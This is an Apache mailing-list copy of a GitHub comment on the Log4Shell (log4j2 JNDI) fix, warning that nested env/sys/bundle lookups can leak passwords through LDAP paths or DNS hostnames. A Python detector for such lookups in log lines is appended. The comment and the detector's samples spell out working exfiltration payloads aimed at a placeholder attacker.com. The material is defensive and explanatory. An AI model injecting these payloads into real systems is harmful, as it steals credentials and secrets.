Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/10 22:47:32 UTC

[GitHub] [logging-log4j2] ahahu commented on pull request #608: Restrict LDAP access via JNDI

ahahu commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-991354707


   I'd also like to stress that it is not sufficient to mitigate this vulnerability by using a JRE/JDK version which prevents the RCE, nor should you rely solely on your firewalls dropping outgoing TCP traffic.

   The reason is that the vulnerability also has the potential for leaking sensitive information via the LDAP request or via DNS.
   Variable substitution in the payload can be nested, and one can use the "sys", "env" or "bundle" keywords to access sensitive data, which is then used either in the LDAP URL path or in the hostname.

   Example for exfiltrating an environment variable containing a password used in the URL path:
   `${jndi:ldap://www.attacker.com:1389/${env:MYSQL_PASSWORD}}`
   This could be resolved to `ldap://www.attacker.com:1389/mysecretpassword`, for example.

   Example for exfiltrating an environment variable containing a password in the hostname part:
   `${jndi:ldap://${env:MYSQL_PASSWORD}.attacker.com:1389/a}`
   This could be resolved to `ldap://mysecretpassword.attacker.com:1389/a`, for example.
   Of course this will fail if certain special characters are used in the password.

   Example for exfiltrating the property "spring.datasource.password" from the application.properties file of a Spring Boot application:
   `${jndi:ldap://${bundle:application:spring.datasource.password}.attacker.com:1389/a}`

   Example for exfiltrating a system property that was passed through the command line:
   `${jndi:ldap://${sys:db.password}.attacker.com:1389/a}`
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@logging.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org
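Detection logic for the nested-lookup exfiltration pattern ahahu describes, as an added example that is not part of the PR comment or of Log4j itself: it walks each `${jndi:...}` lookup found in a log line (tolerating an outer brace that never closes, as in a truncated line) and reports the `env`, `sys` and `bundle` lookups nested inside it. The sample log lines are constructed for this example and reuse the comment's placeholder host.

```python
import re

# Opening of any Log4j-style lookup: "${", an optional space, a prefix, a colon.
LOOKUP_OPEN = re.compile(r"\$\{\s*([A-Za-z0-9_-]+):")
# The lookups the comment names as secret sources when nested inside a jndi lookup.
NESTED_SECRET = re.compile(r"\$\{\s*(env|sys|bundle):([^${}]+)\}", re.I)

def lookup_body(text: str, start: int) -> str:
    """Content of the ${...} that opens at `start`, up to its matching close brace.
    If the outer brace never closes (truncated payload), everything to the end of
    the string is returned so nested lookups are still seen."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 2:i]
        i += 1
    return text[start + 2:]

def analyse_line(line: str) -> dict:
    """Report every jndi lookup in a log line plus the env/sys/bundle lookups nested
    inside each one; `exfiltration` is True when at least one such lookup is nested."""
    hits = []
    for m in LOOKUP_OPEN.finditer(line):
        if m.group(1).lower() != "jndi":
            continue
        body = lookup_body(line, m.start())
        leaks = [(src.lower(), key) for src, key in NESTED_SECRET.findall(body)]
        hits.append({"body": body, "leaks": leaks})
    return {"jndi_count": len(hits), "lookups": hits,
            "exfiltration": any(h["leaks"] for h in hits)}

# Constructed sample log lines (access-log style, user-agent field); the payload
# shapes are the ones from the comment above, the two last lines are controls.
SAMPLE_LINES = [
    'GET /login ua="${jndi:ldap://www.attacker.com:1389/${env:MYSQL_PASSWORD}}"',
    'GET / ua="${jndi:ldap://${env:MYSQL_PASSWORD}.attacker.com:1389/a}"',
    'GET / ua="${jndi:ldap://${bundle:application:spring.datasource.password}.attacker.com:1389/a}"',
    'GET / ua="${jndi:ldap://${sys:db.password}.attacker.com:1389/a}"',
    'GET / ua="${jndi:ldap://www.attacker.com:1389/a}"',   # jndi, nothing nested
    'GET /static/app.js ua="Mozilla/5.0"',                  # benign
]

def flagged(lines: list) -> list:
    return [i for i, line in enumerate(lines) if analyse_line(line)["exfiltration"]]
```

A plain `${jndi:` match alone still deserves an alert; the nested-lookup report is what tells the responder which secret the request tried to carry out.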